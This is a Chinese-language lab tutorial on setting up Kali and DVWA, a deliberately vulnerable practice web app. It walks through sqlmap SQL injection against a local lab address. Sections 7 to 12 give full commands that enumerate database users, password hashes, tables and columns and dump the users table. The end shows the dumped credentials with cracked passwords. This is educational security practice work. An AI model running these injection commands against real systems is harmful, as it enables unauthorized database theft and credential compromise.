sqlmap注入

文章目录

        • 1.概述用VirtualBox搭建kali
        • 2.更多渗透测试文章参考
        • 3.概述用VMware Workstation搭建DVWA
        • 4.拓扑图的展示
        • 5.设置DVWA的安全等级
        • 6.提交DVWA的注入点,进行渗透测试
        • 7.使用sqlmap检索DVWA数据库和用户
        • 8.使用salmap枚举用户和用户密码
        • 9.使用sqlmap枚举用户所有的数据库名称
        • 10.使用sqlmap枚举DVWA的数据表
        • 11.使用sqlmap枚举数据表中的字段
        • 12.拖库

1.概述用VirtualBox搭建kali

1-1.点击设置
sqlmap注入_第1张图片

1-2.注意:网络要打上勾,否则系统启动时没有连接到网卡
sqlmap注入_第2张图片

1-3.打开网络的接入网线,否则不能连接网卡上网
sqlmap注入_第3张图片
sqlmap注入_第4张图片

1-4.连接方式,我选择网络地址转换(NAT),因为可以上外网,也可以连接局域网
sqlmap注入_第5张图片

2.更多渗透测试文章参考

请看以下链接:

渗透测试的学习

3.概述用VMware Workstation搭建DVWA

我为了方便,用shell脚本部署,请参考以下链接:

Shell脚本部署DVWA

4.拓扑图的展示

sqlmap注入_第6张图片

5.设置DVWA的安全等级

5-1.点击DVWA Security
sqlmap注入_第7张图片

5-2.设置安全等级为low(最低级),然后点击提交(Submit)
sqlmap注入_第8张图片

6.提交DVWA的注入点,进行渗透测试

6-1.点击SQL Injection
sqlmap注入_第9张图片

6-2.提交ID为10的注入点
sqlmap注入_第10张图片

6-3.查看你URL的链接发生了变化
sqlmap注入_第11张图片

7.使用sqlmap检索DVWA数据库和用户

7-1查看Kali的IP地址

7-2.ping一下DVWA服务的IP地址是否能通

7-3.在浏览器打开F12–>点击Network–>点击?id=10&Submit=Submit–>查看Cookie值
sqlmap注入_第12张图片
sqlmap注入_第13张图片

7-4.进行sqlmap注入
sqlmap注入_第14张图片

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -b --current-db --current-user
参数说明:
--cookie : 是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息
-u : 指定目标URL,syql注入点
-b : 获取DBMS banner(DBMS:Database Management System 数据库管理系统)
--current-db : 获取当前数据库
--current-user :获取当前用户

7-5.查看到DVWA的用户和数据库的信息,一直选着y就行了
sqlmap注入_第15张图片

8.使用salmap枚举用户和用户密码

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --users --password
参数说明:
--users : 枚举DBMS用户
--password : 枚举DBMS用户密码的MD5

8-1.查看枚举用户和用户密码的MD5

8-2.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件
sqlmap注入_第16张图片

8-3.可以查看到用户的密码


9.使用sqlmap枚举用户所有的数据库名称

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' --dbs
参数说明:
--dbs 枚举DBMS中的所有数据库

9-1.查看数据库名


10.使用sqlmap枚举DVWA的数据表

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa --tables
参数说明:
-D 指定枚举的DBMS数据库
--tables 枚举DBMS数据库中的数据表

10-1.查看dvwa的数据库中的数据表


11.使用sqlmap枚举数据表中的字段

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users --columns
参数说明:
-T : 指定枚举的DBMS数据表
--columns : 枚举DBMS数据表中的所有字段

11-1.查看dvwa数据库中的users数据表中的字段


12.拖库

sqlmap -u "http://172.25.0.100/DVWA-master/vulnerabilities/sqli/?id=10&Submit=Submit#" --cookie='security=low; PHPSESSID=ijkekge8a2dci3cqco97hnt116' -D dvwa -T users -C user,password --dump
参数说明:\
-D: 指定枚举的DBMS数据库
-T: 指定枚举的DBMS数据表
-C: 要枚举的DBMS数据表中的列(数据)
--dump: 转储DBMS数据表项

12-1.选择字典,1为默认系统自带的字典,2自定义字典,3带有字典的文件

12-2.这里我选着了默认字典
sqlmap注入_第17张图片
12-3.查看user和password字段的数据

#拖库成功,可以查看到数据的文件
cat /root/.sqlmap/output/172.25.0.100/dump/dvwa/users.csv
user,password
1337,8d3533d75ae2c3966d7e0d4fcc69216b (charley)
admin,5f4dcc3b5aa765d61d8327deb882cf99 (password)
gordonb,e99a18c428cb38d5f260853678922e03 (abc123)
pablo,0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)
smithy,5f4dcc3b5aa765d61d8327deb882cf99 (password)

你可能感兴趣的:(sql注入)